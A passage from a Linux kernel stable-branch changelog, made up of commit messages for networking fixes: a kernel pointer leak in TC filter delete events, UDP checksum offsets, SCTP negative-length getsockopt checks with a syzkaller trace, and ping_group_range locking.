node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.
When a user successfuly deletes a specific filter, by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.
Before this patch, the "fh" value was sent to user space as the identity.
As an example what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is infact a 32-bit truncation of 0xffff8807f3be0c80
which happens to be a 64-bit memory address of the internal filter
representation (address of the corresponding filter's struct cls_bpf_prog);
After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink rules is to be able to take an
event (such as a delete in this case) and reflect it back to the
kernel and successfully delete the filter. This patch achieves that.
Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/
[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/
Fixes:
4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Mon, 24 Oct 2016 01:03:06 +0000 (18:03 -0700)]
udp: fix IP_CHECKSUM handling
[ Upstream commit
10df8e6152c6c400a563a673e9956320bfce1871 ]
First bug was added in commit
ad6f939ab193 ("ip: Add offset parameter to
ip_cmsg_recv") : Tom missed that ipv4 udp messages could be received on
AF_INET6 socket. ip_cmsg_recv(msg, skb) should have been replaced by
ip_cmsg_recv_offset(msg, skb, sizeof(struct udphdr));
Then commit
e6afc8ace6dd ("udp: remove headers from UDP packets before
queueing") forgot to adjust the offsets now UDP headers are pulled
before skb are put in receive queue.
Fixes:
ad6f939ab193 ("ip: Add offset parameter to ip_cmsg_recv")
Fixes:
e6afc8ace6dd ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Sam Kumar <samanthakumar@google.com>
Cc: Willem de Bruijn <willemb@google.com>
Tested-by: Willem de Bruijn <willemb@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Jiri Slaby [Fri, 21 Oct 2016 12:13:24 +0000 (14:13 +0200)]
net: sctp, forbid negative length
[ Upstream commit
a4b8e71b05c27bae6bad3bdecddbc6b68a3ad8cf ]
Most of getsockopt handlers in net/sctp/socket.c check len against
sizeof some structure like:
if (len < sizeof(int))
return -EINVAL;
On the first look, the check seems to be correct. But since len is int
and sizeof returns size_t, int gets promoted to unsigned size_t too. So
the test returns false for negative lengths. Yes, (-1 < sizeof(long)) is
false.
Fix this in sctp by explicitly checking len < 0 before any getsockopt
handler is called.
Note that sctp_getsockopt_events already handled the negative case.
Since we added the < 0 check elsewhere, this one can be removed.
If not checked, this is the result:
UBSAN: Undefined behaviour in ../mm/page_alloc.c:2722:19
shift exponent 52 is too large for 32-bit type 'int'
CPU: 1 PID: 24535 Comm: syz-executor Not tainted 4.8.1-0-syzkaller #1
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.9.1-0-gb3ef39f-prebuilt.qemu-project.org 04/01/2014
0000000000000000 ffff88006d99f2a8 ffffffffb2f7bdea 0000000041b58ab3
ffffffffb4363c14 ffffffffb2f7bcde ffff88006d99f2d0 ffff88006d99f270
0000000000000000 0000000000000000 0000000000000034 ffffffffb5096422
Call Trace:
[<
ffffffffb3051498>] ? __ubsan_handle_shift_out_of_bounds+0x29c/0x300
...
[<
ffffffffb273f0e4>] ? kmalloc_order+0x24/0x90
[<
ffffffffb27416a4>] ? kmalloc_order_trace+0x24/0x220
[<
ffffffffb2819a30>] ? __kmalloc+0x330/0x540
[<
ffffffffc18c25f4>] ? sctp_getsockopt_local_addrs+0x174/0xca0 [sctp]
[<
ffffffffc18d2bcd>] ? sctp_getsockopt+0x10d/0x1b0 [sctp]
[<
ffffffffb37c1219>] ? sock_common_getsockopt+0xb9/0x150
[<
ffffffffb37be2f5>] ? SyS_getsockopt+0x1a5/0x270
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Cc: Vlad Yasevich <vyasevich@gmail.com>
Cc: Neil Horman <nhorman@tuxdriver.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: linux-sctp@vger.kernel.org
Cc: netdev@vger.kernel.org
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
WANG Cong [Thu, 20 Oct 2016 21:19:46 +0000 (14:19 -0700)]
ipv4: use the right lock for ping_group_range
[ Upstream commit
396a30cce15d084b2b1a395aa6d515c3d559c674 ]
This reverts commit
a681574c99be23e4d20b769bf0e543239c364af5
("ipv4: disable BH in set_ping_group_range()") because we never
read ping_group_range in BH context (unlike local_port_range).
Then, since we already have a lock for ping_group_range, those
using ip_local_ports.lock for ping_group_range are clearly typos.
We might consider to share a same lock for both ping_group_range
and local_port_range w.r.t. space saving, but that should be for
net-next.
Fixes:
a681574c99be ("ipv4: disable BH in set_ping_group_range()")
Fixes:
ba6b918ab234 ("ping: move ping_group_range out of CONFIG_SYSCTL")
Cc: Eric Dumazet <edumazet@google.com>
Cc: Eric Salo <salo@google.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Eric Dumazet [Thu, 20 Oct 2016 17:26:48 +0000 (10:26 -0700)]
ipv4: disable BH in set_ping_group_range()
[ Upstream commit
a681574c99be23e4d20b769bf0e543239c364af5 ]
In commit
4ee3bd4a8c746 ("ipv4: disable BH when changing ip local port
range") Cong added BH protection in set_local_port_range() but missed
that same fix was needed in set_ping_group_range()
Fixes:
b8f1a55639e6 ("udp: Add function to make source port for UDP tunnels")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Eric Salo <salo@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>